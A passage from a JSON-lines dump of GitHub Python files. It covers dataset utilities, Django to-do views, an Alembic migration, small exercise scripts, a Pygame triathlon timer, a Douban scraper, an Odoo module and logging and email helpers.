line_item.quantity\n\n\n\n\n","repo_name":"DLzer/pk-fs-eval","sub_path":"backend/src/models/plan.py","file_name":"plan.py","file_ext":"py","file_size_in_byte":1715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"4754796481","text":"# -*- encoding: utf-8 -*-\n\"\"\"\n# @Time : 2022/11/11 下午6:27\n# @Author : Jianwei Yang\n# @File : gen_icpr_infos.py\n# @Project: mmtracking\n\"\"\"\n\nimport argparse\nimport glob\nimport os\nimport os.path as osp\nimport time\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(\n description='Generate the information of ICPR dataset')\n parser.add_argument(\n '-i',\n '--input',\n help='root directory of ICPR dataset',\n )\n parser.add_argument(\n '-o',\n '--output',\n help='directory to save text file',\n )\n parser.add_argument(\n '-d',\n '--datatype',\n help='the datastyle of ICPR dataset(training or validation)'\n )\n return parser.parse_args()\n\n\ndef gen_data_infos(data_root, save_dir, datatype):\n \"\"\"Generate dataset information.\n\n Args:\n data_root (str): The path of dataset.\n save_dir (str): The path to save the information of dataset.\n \"\"\"\n print('Generate the information of ICPR dataset...')\n start_time = time.time()\n\n subdir = datatype\n videos_list = os.listdir(osp.join(data_root, subdir))\n videos_list = [\n x for x in videos_list if osp.isdir(osp.join(data_root, subdir, x))\n ]\n\n if not osp.isdir(save_dir):\n os.makedirs(save_dir, exist_ok=True)\n\n videos_list = sorted(videos_list)\n with open(osp.join(save_dir, f'icpr_{datatype}_infos.txt'), 'w') as f:\n f.write('The format of each line in this txt is '\n '(video_path,annotation_path,start_frame_id,end_frame_id)')\n for video_name in videos_list:\n video_path = osp.join(datatype, video_name)\n\n ann_dir_path = osp.join(datatype, video_name, 'sot')\n ann_files = glob.glob(osp.join(data_root, ann_dir_path, '*.txt'))\n ann_files = sorted(ann_files, key=lambda x: int(osp.basename(x).split('.')[0].split('_')[0]))\n\n split_num = len(data_root)\n for ann_path in ann_files:\n start_frame_id = osp.basename(ann_path).split('.')[0].split('_')[1]\n end_frame_id = osp.basename(ann_path).split('.')[0].split('_')[2]\n ann_path_final = ann_path[split_num+1:]\n video_path_final = video_path + '/img1'\n\n f.write(f'\\n{video_path_final},{ann_path_final},{start_frame_id},{end_frame_id}')\n\n print(f'Done! ({time.time() - start_time:.2f} s)')\n print(f'The results are saved in {save_dir}')\n\n\ndef main():\n args = parse_args()\n gen_data_infos(args.input, args.output, args.datatype)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Mr-IronMan/mmtracking","sub_path":"tools/convert_datasets/ICPR/gen_icpr_infos.py","file_name":"gen_icpr_infos.py","file_ext":"py","file_size_in_byte":2594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"14024181491","text":"from custom_error_classes import DateInputError\n\n\ndef looking_for_date(input_string):\n check_for_date = False\n for data in input_string:\n if len(data) == 10 and data[2] == '.' and data[5] == '.':\n str_replace = data.replace('.', '')\n if str_replace.isdigit():\n check_for_date = True\n if not check_for_date:\n raise DateInputError('ОШИБКА! Не введена дата рождения в формате dd.mm.yyyy\\n')\n","repo_name":"AlevtinAntonov/exeption","sub_path":"seminar_3/looking_for_date.py","file_name":"looking_for_date.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"72753646195","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom webapp.models import To_Do_list, STATUS_CHOICES\nfrom webapp.forms import TaskForm\nfrom django.http import HttpResponseNotAllowed\n\n\ndef task_list(request):\n data = To_Do_list.objects.all()\n return render(request, 'index_to_do.html', context={\n 'task_list': data\n })\n\n\ndef task_view(request, pk):\n task = get_object_or_404(To_Do_list, pk=pk)\n context = {'task': task}\n return render(request, \"task.html\", context)\n\n\ndef task_delete_view(request, pk):\n task = get_object_or_404(To_Do_list, pk=pk)\n if request.method == 'GET':\n return render(request, 'delete.html', context={'task': task})\n elif request.method == 'POST':\n task.delete()\n return redirect(\"task_list\")\n\n\ndef task_create_view(request, *args, **kwargs):\n if request.method == \"GET\":\n return render(request, 'task_create.html', context={\n 'form': TaskForm()\n })\n elif request.method == 'POST':\n form = TaskForm(data=request.POST)\n if form.is_valid():\n summary = form.cleaned_data['summary']\n description = form.cleaned_data['description']\n status = form.cleaned_data['status']\n completion_time = form.cleaned_data['completion_time']\n if completion_time:\n task = To_Do_list.objects.create(summary=summary, description=description,\n completion_time=completion_time,\n status=status)\n else:\n task = To_Do_list.objects.create(summary=summary, description=description,\n status=status)\n return redirect('task_view', pk=task.pk)\n else:\n return render(request, 'task_create.html', context={'form': form})\n else:\n return HttpResponseNotAllowed(permitted_methods=['GET', 'POST'])\n\n\ndef task_update_view(request, pk):\n task = get_object_or_404(To_Do_list, pk=pk)\n if request.method == \"GET\":\n form = TaskForm(data={\n 'status': task.status,\n 'summary': task.summary,\n 'description': task.description,\n 'completion_time': task.completion_time\n })\n return render(request, 'task_update.html', context={'form': form, 'task': task})\n elif request.method == 'POST':\n form = TaskForm(data=request.POST)\n if form.is_valid():\n task.status = form.cleaned_data['status']\n task.summary = form.cleaned_data['summary']\n task.description = form.cleaned_data['description']\n task.completion_time = form.cleaned_data['completion_time']\n task.save()\n return redirect('task_view', pk=task.pk)\n else:\n return render(request, 'task_update.html', context={'task': task, 'form': form})\n else:\n return HttpResponseNotAllowed(permitted_methods=['GET', 'POST'])\n\n\n","repo_name":"Illarionov81/python_group_5_homework_45_Alexander_Illarionov","sub_path":"source/webapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"26771120402","text":"\"\"\"added invoice model\n\nRevision ID: a15fe29fe566\nRevises: bdb82b2b0eb0\nCreate Date: 2016-04-14 20:44:53.860856\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = 'a15fe29fe566'\ndown_revision = 'bdb82b2b0eb0'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.create_table('invoices',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('owner_id', sa.Integer(), nullable=False),\n sa.Column('ref_num', sa.Integer(), nullable=False),\n sa.Column('issued_on', sa.DateTime(), nullable=False),\n sa.ForeignKeyConstraint(['owner_id'], ['users.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('invoices')\n ### end Alembic commands ###\n","repo_name":"skazi0/yaia","sub_path":"migrations/versions/a15fe29fe566_added_invoice_model.py","file_name":"a15fe29fe566_added_invoice_model.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"24789182044","text":"#!/usr/bin/python\nimport subprocess, os, sys\n \nsize = [10,20,40,80,100,200,400,800,1600,3200,6400,12800,25600,51200,102400,204800,409600,819200,1638400,3276800]\ntab = [\"Reversed\",\"Shuffle\",\"Normal\"]\n \nif not os.path.isdir(\"./io/saidas/\" + \"Conta_inversao\" + \"/\"):\n os.makedirs(\"./io/saidas/\" + \"Conta_inversao\" + \"/\")\n \nfor y in tab:\n saida = \"./io/saidas/Conta_inversao/\" + \"saida_\" + y.lower + \".csv\"\n fp=open(saida, \"w+\")\n for z in size:\n # entrada = \"Entradas/ent_\" + y + \"_\" + str(z) + \".txt\"\n inpath = \"./io/entradas/\" + y + \"/\"\n infile_name = inpath + str(z) + \"_\" + y.lower + \".txt\"\n cmd = \" ./bin/\" + mode.lower() + \".out < \" + infile_name\n p = subprocess.Popen(cmd,stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n line = \"\"\n for aux in iter(p.stdout.readline, b''):\n line = str(aux.rstrip())\n break\n aux = line.split(\"'\")\n print(aux[1], file=fp)","repo_name":"diegomarq/PAA-UnB","sub_path":"trab2/util/run_containversao.py","file_name":"run_containversao.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"1768388166","text":"j=int(input())\r\nb=list(map(int,input().split()))\r\nl=[]\r\nm=[]\r\nn=[]\r\nc=0\r\nd=1\r\nwhile(c<100000):\r\n l.append(c)\r\n c+=2\r\nwhile(d<100000):\r\n m.append(d)\r\n d+=2\r\nfor i in range(j):\r\n if((b[i] in l) and (i in m)):\r\n n.append(b[i])\r\n elif((b[i] in m) and (i in l)):\r\n n.append(b[i])\r\nprint(\" \".join(map(str,n)))\r\n","repo_name":"Avaneeshj/hunter","sub_path":"07.py","file_name":"07.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"71757598192","text":"words = []\nlongest = 0\ncolumn = ''\n\nfor _ in range(5):\n row = input()\n words.append(row)\n if len(row) > longest:\n longest = len(row)\nfor i in range(longest):\n for j in range(5):\n if words[j]:\n column += words[j][0]\n words[j] = words[j][1:]\nprint(column)","repo_name":"athletejuan/TIL","sub_path":"Algorithm/BOJ/08_string/10798.py","file_name":"10798.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"35770534071","text":"#导入工具\nimport turtle\nimport random\nimport time\n\n#设置画笔\nt = turtle.Turtle()\nt.pensize(1)\nt.ht()\nt.speed(0)\nt1 = turtle.Turtle()\nt1.ht()\nt1.left(90)\n\n#绘制小方格的函数\ndef square(x, y, c):\n t.color(c)\n t.penup()\n t.goto(x, y)\n t.pendown()\n t.begin_fill()\n for x in range(4):\n t.forward(50)\n t.right(90)\n t.end_fill()\n\n\n#创建列表存放位置,分别是左上, 右上, 左下, 右下\n# local = [[-25, 25], [25, 25], [-25, -25], [25, -25]]\n\n#调用函数绘制四个小方格\nsquare(-50, 50, \"pink\")\nsquare(0, 50, \"green\")\nsquare(-50, 0, \"orange\")\nsquare(0, 0, \"purple\")\n\n#控制海龟位置的函数\ndef drawer(x):\n t1.penup()\n if x == 1:\n t1.goto(-25, 25)\n elif x == 2:\n t1.goto(25, 25)\n elif x == 3:\n t1.goto(-25, -25)\n else:\n t1.goto(25, -25)\n t1.pendown()\n t1.st()\n t1.shape(\"turtle\")\n time.sleep(0.5)\n t1.ht()\n\n#开始---------------------------------------------------------------\n# #调用函数让小海龟移动\n# drawer(1)\n# drawer(2)\n# drawer(3)\n# drawer(4)\nt2 = turtle.Turtle()\nwhile True:\n s = \"\"\n for x in range(4):\n area = random.randint(1, 4)\n drawer(area)\n s += str(area)\n\n a = input(\"请输入海龟的出现次序: \")\n if s == a:\n t2.write(\"祝贺你, 回答正确\", font=(\"arial\", 12))\n break\n else:\n t2.write(\"别灰心, 再试一次\", font=(\"arial\", 12))\n time.sleep(3)\n t2.clear()\n\n#结束-----------------------------------------------\n#持续显示\nturtle.done()\n","repo_name":"18265742937/P2_Class","sub_path":"VipCode/Class/Python/LCP_VipCode__P1/LCP_VipCode__PJ/unit5/class44.py","file_name":"class44.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"2678059980","text":"import pygame\nimport numpy as np\nimport time\nfrom random import randint\nimport datetime\nfrom os.path import exists\nfrom copy import deepcopy\nfrom Participant import Participant\nfrom ParticipantButton import * \n \npygame.init()\nglobal participants\nparticipants = []\n#global deltagare_lista\nglobal fuck_it_ofsett_x\nglobal fuck_it_ofsett_y\nfuck_it_ofseff_x = 100\nfuck_it_ofseff_y = 0\nWIDTH, HEIGHT = 1400, 800\nWIN = pygame.display.set_mode((WIDTH, HEIGHT))\nfont = pygame.font.SysFont(\"Arial\", 15)\npygame.display.set_caption(\"main window\")\nWHITE = (255,255,255)\nFPS = 20\n\n\n#alla deltagare får en knapp tillägnat sig. Just nu gör knappen ingenting mer än att byta färg när man klickar på den. Tanken är att knappen ska fungera som en start och slutklocka. \n\ndef start_group(group):\n for button in participant_buttons: \n if button.participant.start_group == group:\n button.start()\n\ndef minuts_and_sec_as_str_to_sec(str):\n str_parts = str.split(\":\")\n str_parts[0] = int(str_parts[0])\n str_parts[1] = int(str_parts[1])\n seconds = str_parts[0]*60+str_parts[1]\n return seconds\n\ndef sec_as_str_to_minuts_and_sec(str):\n tot_sec = int(str)\n min = int(tot_sec//60)\n sec = tot_sec%60\n min_and_sec = str(min)+\":\"+str(sec)\n return min_and_sec\n\n\n\n#ladda in fil och skapa deltagare_lista\ndef set_up(file_name):\n tmp = []\n f = open(file_name, \"r\")\n for x in f:\n y = x.split()\n if len(y) < 3:\n continue\n #formatet på datetime lägger till ett mellanslag/elemet. Sätter ihop elementen och tar bort det \"onödiga\" elementet.\n if len(y) > 11:\n y[5] = y[5] + \" \" + y[6]\n del y[6]\n y[6] = y[6] + \" \" + y[7]\n del y[7]\n #gissad_tid formatering\n try:\n y[1] = int(y[1])\n except ValueError:\n # Handle the exception\n if \":\" in y[1]:\n y[1] = minuts_and_sec_as_str_to_sec(y[1])\n else:\n y[0] = \"*\" + y[0]\n y[1] = 100000\n \n if y[2] == \"True\":\n y[2] = True\n else: \n y[2] = False\n if y[3] == \"True\":\n y[3] = True\n else: \n y[3] = False\n if y[4] == \"True\":\n y[4] = True\n else: \n y[4] = False\n if y[5] == \"0\" or len(y)==5 or y[5] == \"start_tid\":\n tmp.append(Participant(y[0], y[1], y[2], y[3], y[4]))\n continue\n else:\n #2022-06-20 11:40:15.846478\n y[5] = datetime.datetime.strptime(y[5], \"%Y-%m-%d %H:%M:%S.%f\" )\n if y[6] == \"0\" or len(y)==5 or y[6] == \"slut_tid\":\n y[6] = None\n else:\n y[6] = datetime.datetime.strptime(y[6], \"%Y-%m-%d %H:%M:%S.%f\")\n if y[7] == \"0\" or y[7]==\"-1\" or len(y)==5 or y[7] == \"procentuell_skilnad\":\n y[7] = -1\n if y[8] == \"True\":\n y[8] = True\n else:\n y[8] = False\n \n if y[10] == \"True\":\n y[10] = True\n else:\n y[10] = False\n\n #tmp = name, gissda_tid, cykla, springa, simma, start_tid, slut_tid, procentruell_skilnad, fortfarande_aktiv, start_grupp, startat\n tmp.append(Participant(y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9], y[10]))\n print(\"just nu är ser deltagarlistan ut som följer:\", tmp)\n return tmp\n\n#skapa knappar för alla deltagare i deltagare_lista\ndef set_up_buttons():\n buttons = []\n i = 0\n j = 40\n for participant in participants:\n buttons.append(Participant_Button(participant, (i,j)))\n j += 30\n if j>HEIGHT-100:\n i += 500\n j = 40\n return buttons\n\n#skapa korrekt formaterad backup fil\ndef back_up(lista):\n tid = datetime.datetime.now().strftime(\"%H:%M:%S\")+\".txt\"\n f = open(tid, \"w\")\n for participant in lista:\n f.write(participant.to_file())\n f.close()\n return\n\n#skapa en \"snyggare\" fil\ndef back_up_simpel(lista,version):\n tid = datetime.datetime.now().strftime(\"%H:%M:%S\")+version+\".txt\"\n f = open(tid, \"w\")\n for participant in lista:\n f.write(participant.to_file_simple())\n f.close()\n return\n#end back_up\n\n#bubbelsort, går att optimera lite granna\ndef sortera():\n quickest = []\n best = []\n\n for participant in participants:\n participant.calculate_result()\n\n quickest = deepcopy(participants)\n best = deepcopy(participants)\n\n for i in range(len(participants)-1):\n for j in range(len(participants)-1):\n if best[j].difference_as_percentage > best[j+1].difference_as_percentage:\n best[j], best[j+1] = best[j+1], best[j]\n\n # for i in range(len(quickest)): #i = [1,2,3,4,5,6,7,8,9,10,11,13,14]\n # if not quickest[i].do_all_three:\n # del quickest[i]\n # i=i-1\n i = 0 \n while i < len(quickest): \n if not quickest[i].do_all_three:\n del quickest[i]\n i -= 1\n i += 1\n\n for i in range(len(quickest)-1):\n for j in range(len(quickest)-1):\n if quickest[j].difference > quickest[j+1].difference:\n quickest[j],quickest[j+1] = quickest[j+1], quickest[j]\n\n print(\"Snabbast: \\n\", quickest) #skriv ut resultatet i terminalen\n print(\"Bäst gissat: \\n\", best)\n back_up(quickest) #skriv in resultatet i en txt-fil\n back_up(best)\n back_up_simpel(quickest, \"snabbast\")\n back_up_simpel(best, \"bäst gissat\")\n\n#end sortera\n\ndef sort_by_name():\n for i in range(len(participants)-1):\n for j in range(len(participants)-1):\n current = participants[j]\n next = participants[j+1]\n if str(current.start_group)+current.name > str(next.start_group)+next.name:\n participants[j], participants[j+1] = participants[j+1], participants[j]\n print(participants) #skriv ut resultatet i terminalen\n back_up(participants) #skriv in resultatet i en txt-fil\n\ndef fuckit():\n print(\"startgrupp namn gissad_tid alla_grenar(y/n)\")\n #inputs = input()\n inputs = \"2 Jakob 30:30 n\"\n inputs = inputs.split()\n if len(inputs) != 4:\n print(\"malformed input\")\n return \n try:\n inputs[2] = int(inputs[2])\n except ValueError:\n # Handle the exception\n if \":\" in inputs[2]:\n inputs[2] = minuts_and_sec_as_str_to_sec(inputs[2])\n \n if inputs[3]==\"n\":\n bike=False\n else:\n bike=True\n\n participants.append(Participant(inputs[1], inputs[2], bike, True, True, datetime.datetime.fromtimestamp(0.000001), datetime.datetime.fromtimestamp(0.000001), -1 , False, inputs[0], False))\n \n global fuck_it_ofseff_y\n global fuck_it_ofseff_x\n participant_buttons.append(Participant_Button(participants[-1],(WIDTH-fuck_it_ofseff_x,HEIGHT-fuck_it_ofseff_y)))\n fuck_it_ofseff_y = fuck_it_ofseff_y+30\n\ndef main():\n global fuck_it_ofseff_y\n fuck_it_ofseff_y = 40\n global fuck_it_ofseff_x\n fuck_it_ofseff_x = 300\n global participants #VARFÖR BEHÖVS DENNA?! ÄR JU DEKLARERAD GLOBAL LÄNGD UPP I KODEN?!\n participants = set_up(\"deltagare.txt\")\n sort_by_name() #soterar listan i bokstavsordning\n global participant_buttons\n participant_buttons = set_up_buttons()\n clock = pygame.time.Clock()\n run = True\n input_box = pygame.Rect(0, 0, 140, 40)\n color_inactive = pygame.Color('lightskyblue3')\n color_active = pygame.Color('dodgerblue2')\n color = color_inactive\n active = False\n text = ''\n comando = \"\"\n\n while run:\n clock.tick(FPS)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n back_up(participants)\n # lägg till så back-up fil skapas\n run = False\n if event.type == pygame.MOUSEBUTTONDOWN:\n if input_box.collidepoint(event.pos):\n active = not active\n else:\n active = False\n color = color_active if active else color_inactive\n if event.type == pygame.KEYDOWN:\n if active:\n if event.key == pygame.K_RETURN:\n print(text)\n comando = text\n text = ''\n elif event.key == pygame.K_BACKSPACE:\n text = text[:-1]\n else:\n text += event.unicode\n\n for button in participant_buttons:\n button.click(event)\n #button1.click(event)\n\n #end for event in pygame\n\n if comando == \"resultat\":\n sortera()\n comando = \"\"\n elif comando == \"add competetor\":\n #todo\n x = 6\n elif comando == \"redo set-up\":\n print(\"skriv filname i terminalen\")\n file_name = input()\n if exists(file_name):\n participants = set_up(file_name)\n set_up_buttons()\n comando = \"\"\n elif comando == \"f\":\n fuckit()\n comando = \"\"\n elif comando[0:5] == \"start\":\n comando = comando.split()\n print(\"startade grupp: \" + comando[-1])\n start_group(comando[-1])\n comando = \"\"\n elif comando == \"sluta alla\":\n for button in participant_buttons:\n button.start()\n print(\"sover\")\n time.sleep(2)\n print(\"vaknat\")\n for button in participant_buttons:\n button.fin()\n comando = \"\"\n \n\n #WIN.fill((WHITE))\n WIN.fill((1, 1, 1))\n # Render the current text.\n txt_surface = font.render(text, True, color)\n # Resize the box if the text is too long.\n width = max(200, txt_surface.get_width()+10)\n input_box.w = width\n #button1.show()\n # Blit the text.\n\n for button in participant_buttons:\n button.show(WIN)\n\n \n\n WIN.blit(txt_surface, (input_box.x+5, input_box.y+5))\n # Blit the input_box rect.\n pygame.draw.rect(WIN, color, input_box, 2)\n pygame.display.flip()\n\n #draw_window()\n #end while run\n pygame.quit()\n#end main()\n\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"svenssom/Triathlon3","sub_path":"triatlon.py","file_name":"triatlon.py","file_ext":"py","file_size_in_byte":10300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"74242188269","text":"import requests\nimport json\n\n\ndef Douban():\n url = \"https://movie.douban.com/j/chart/top_list\"\n\n header = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36'\n }\n\n param = {\n 'type': '24',\n 'interval_id': '100:90',\n 'action': '',\n 'start': '0',\n 'limit': '20'\n }\n\n repose = requests.get(url=url, params=param, headers=header)\n list_data = repose.json()\n\n with open('./douban.json', 'w', encoding='utf-8') as fp:\n json.dump(list_data, fp=fp, ensure_ascii=False)\n print(list_data)\n\n\nif __name__ == '__main__':\n Douban()\n","repo_name":"Yang-Jianlin/python-learn","sub_path":"python_BB/pachong/豆瓣.py","file_name":"豆瓣.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"29554689357","text":"import json\n\nfrom eptools.people import fetch_users\n\nfetch_data = False\ntalks_json = 'talks_with_votes.json'\nusers_json = 'users.json'\ntalks = {}\n\nif fetch_data:\n _ = fetch_users (users_json)\n _ = fetch_talks_json(talks_json, conf=conf, status=talks_status, host=host, with_votes=True)\n\nusers = dict(json.load(open(users_json)).items())\ntype_talks = dict(json.load(open(talks_json)).items())\n_ = [talks.update(talkset) for ttype, talkset in type_talks.items()]\n\nlow_vote = 3.0\nlow_voters = set()\n\nfor tid, talk in talks.items():\n talk_low_voters = [uid for pair in talk['user_votes'] for uid, v in pair.items() if v < low_vote]\n low_voters |= set(talk_low_voters)\n\n_ = [print(users[uid]['email']) for uid in low_voters]\n\n","repo_name":"mixmikmic/GH_code_analysis","sub_path":"python/Vote quality check.py","file_name":"Vote quality check.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"21145794928","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api, _\n\nclass Po_location_bisnis(models.Model):\n\t_name = 'stock.move'\n\t_inherit = 'stock.move'\n\n\taccount_analytic_id = fields.Many2one(comodel_name='account.analytic.account', \n\t\t\t\t\t\t\t\t\t\tstring='Unit')\n\tanalytic_tag_ids = fields.Many2one(comodel_name='account.analytic.tag',\n\t\t\t\t\t\t\t\t\t\tstring='Lokasi', \n\t\t\t\t\t\t\t\t\t\tdomain=[('analytic_dimension_id.name','=','LOCATION')]\n\t\t\t\t\t\t\t\t\t\t)\n\tbisnis = fields.Many2one(comodel_name='account.analytic.tag',\n\t\t\t\t\t\t\tstring='Bisnis',\n\t\t\t\t\t\t\tdomain=[('analytic_dimension_id.name','=','BUSINESS')]\n\t\t\t\t\t\t\t)\n\n\nclass Orderpurchase(models.Model):\n\t_name = 'purchase.order'\n\t_inherit = 'purchase.order'\n\n\t@api.multi\n\tdef button_confirm(self):\n\n\t\tres = super(Orderpurchase, self).button_confirm()\n\t\tfor x in self:\n\t\t\tfor order in x.order_line:\n\t\t\t\tpick = x.env['stock.picking'].search([('origin','=', x.name),('picking_type_code','=','incoming')])\n\t\t\t\tmove = x.env['stock.move'].search([('picking_id','=', pick.id),('product_id','=', order.product_id.id)])\n\t\t\t\n\t\t\t\tfor m in move:\n\t\t\t\t\tfor y in pick :\n\t\t\t\t\t\tm.account_analytic_id = order.account_analytic_id\n\t\t\t\t\t\tm.analytic_tag_ids = order.lokasi\n\t\t\t\t\t\tm.bisnis = order.bisniss\n\n\t\treturn res","repo_name":"rahmansaleh7/vit_po_location_bisnis","sub_path":"models/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"21893353995","text":"from modules.email.smtp_send import send_email_from_config\nfrom modules.email.make_new_emails import new_email_nonmultipart\n\n\ndef smtp_send_completion_email(config, display_body):\n if (config['send_notification_email_on_completion']):\n email_details = config['notification_email_on_completion']\n\n email_to_send = new_email_nonmultipart(\n email_from=config['smtp_forward_from'],\n email_to=email_details.recipients,\n subject=email_details.subject,\n bodytext=email_details.body_prefix + '\\n\\n' + display_body,\n )\n\n send_email_from_config(config, email_to_send)\n\n","repo_name":"TarquinQ/email-rule-enforcer","sub_path":"email-rule-enforcer/modules/email/smtp_send_completion_email.py","file_name":"smtp_send_completion_email.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"2972827431","text":"### SKU CoE ITE - ParkSooYoung ###\r\n### Grade 2 , Semester 1 , Chapter 3 , Number 4 ###\r\n\r\nclass Node:\r\n def __init__(self, item, n): # Node 생성자 , 항목과 다음 노드 레퍼런스\r\n self.item = item\r\n self.next = n\r\n\r\ndef add(item): # 삽입 연산\r\n global size # 전역 변수\r\n global front # 전역 변수\r\n global rear # 전역 변수\r\n new_node = Node(item, None) # 새 노드 객체를 생성\r\n if size == 0:\r\n front = new_node # 연결리스트의 맨 뒤에 삽입\r\n else:\r\n rear.next = new_node # 연결리스트의 맨 뒤에 삽입\r\n rear = new_node\r\n size += 1\r\n\r\ndef remove(): # 삭제 연산\r\n global size # 전역 변수\r\n global front # 전역 변수\r\n global rear # 전역 변수\r\n if size != 0:\r\n fitem = front.item\r\n front = front.next # 연결리스트에서 front가 참조하던 노드 분리시킴\r\n size -= 1\r\n if size == 0:\r\n rear = None\r\n return fitem # 제거된 맨 앞의 항목 리턴\r\n\r\ndef print_q(): # 큐 출력\r\n p = front\r\n print('front : ', end='')\r\n while p:\r\n if p.next != None:\r\n print(p.item, '-> ', end='') # 단순연결리스트(스택)의 항목을 차례로 출력\r\n else:\r\n print(p.item, end='')\r\n p = p.next\r\n print(' : rear')\r\n\r\n# 초기화\r\nfront = None\r\nrear = None\r\nsize = 0\r\nadd('apple')\r\nadd('orange')\r\nadd('cherry')\r\nadd('pear')\r\nprint('사과, 오렌지, 체리, 배 삽입 후 : \\t', end='')\r\nprint_q()\r\nremove()\r\nprint('remove한 후 : \\t\\t', end='')\r\nprint_q()\r\nremove()\r\nprint('remove한 후 : \\t\\t', end='')\r\nprint_q()\r\nadd('grape')\r\nprint('포도 삽입 후 : \\t\\t', end='')\r\nprint_q()\r\n","repo_name":"ParkSooYeong/2-1-Data-Structure","sub_path":"Chapter 3/2-1-3-4 slist queue.py","file_name":"2-1-3-4 slist queue.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"37326586089","text":"# -*- coding: utf-8 -*-\n\nimport datetime\nimport logging\nimport os\nimport colorlog\nimport re\nfrom colorama import init\n\nlog_colors_config = {\n 'DEBUG': 'cyan',\n 'WARNING': 'yellow',\n 'ERROR': 'red',\n 'CRITICAL': 'red',\n}\n\n\ndef get_local_time():\n r\"\"\"Get current time\n\n Returns:\n str: current time\n \"\"\"\n cur = datetime.datetime.now()\n cur = cur.strftime('%b-%d-%Y_%H-%M-%S')\n\n return cur\n\n\ndef ensure_dir(dir_path):\n r\"\"\"Make sure the directory exists, if it does not exist, create it\n\n Args:\n dir_path (str): directory path\n\n \"\"\"\n if not os.path.exists(dir_path):\n os.makedirs(dir_path)\n\n\nclass RemoveColorFilter(logging.Filter):\n\n def filter(self, record):\n if record:\n ansi_escape = re.compile(r'\\x1B(?:[@-Z\\\\-_]|\\[[0-?]*[ -/]*[@-~])')\n record.msg = ansi_escape.sub('', str(record.msg))\n return True\n\n\ndef set_color(log, color, highlight=True):\n color_set = ['black', 'red', 'green', 'yellow', 'blue', 'pink', 'cyan', 'white']\n try:\n index = color_set.index(color)\n except:\n index = len(color_set) - 1\n prev_log = '\\033['\n if highlight:\n prev_log += '1;3'\n else:\n prev_log += '0;3'\n prev_log += str(index) + 'm'\n return prev_log + log + '\\033[0m'\n\n\ndef init_logger(params):\n \"\"\"\n A logger that can show a message on standard output and write it into the\n file named `filename` simultaneously.\n All the message that you want to log MUST be str.\n\n Args:\n params: A dict of parameters, used to record parameter information.\n\n \"\"\"\n init(autoreset=True)\n LOGROOT = './log/'\n dir_name = os.path.dirname(LOGROOT)\n ensure_dir(dir_name)\n\n logfilename = 'PDMRec-<{}>-{}.log'.format(params['dataset'], get_local_time())\n\n logfilepath = os.path.join(LOGROOT, logfilename)\n\n # -是左对齐的意思,15是不足15个字符,用空格补全\n filefmt = \"%(asctime)-15s %(levelname)s %(message)s\"\n filedatefmt = \"%a %d %b %Y %H:%M:%S\"\n fileformatter = logging.Formatter(filefmt, filedatefmt)\n\n sfmt = \"%(log_color)s%(asctime)-15s %(levelname)s %(message)s\"\n sdatefmt = \"%d %b %H:%M\"\n sformatter = colorlog.ColoredFormatter(sfmt, sdatefmt, log_colors=log_colors_config)\n\n level = logging.INFO\n\n fh = logging.FileHandler(logfilepath)\n fh.setLevel(level)\n fh.setFormatter(fileformatter)\n remove_color_filter = RemoveColorFilter()\n fh.addFilter(remove_color_filter)\n\n sh = logging.StreamHandler()\n sh.setLevel(level)\n sh.setFormatter(sformatter)\n\n logging.basicConfig(level=level, handlers=[sh, fh])\n","repo_name":"Ethan-Yys/PDMRec","sub_path":"logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":2634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"6293481788","text":"import pickle\nimport 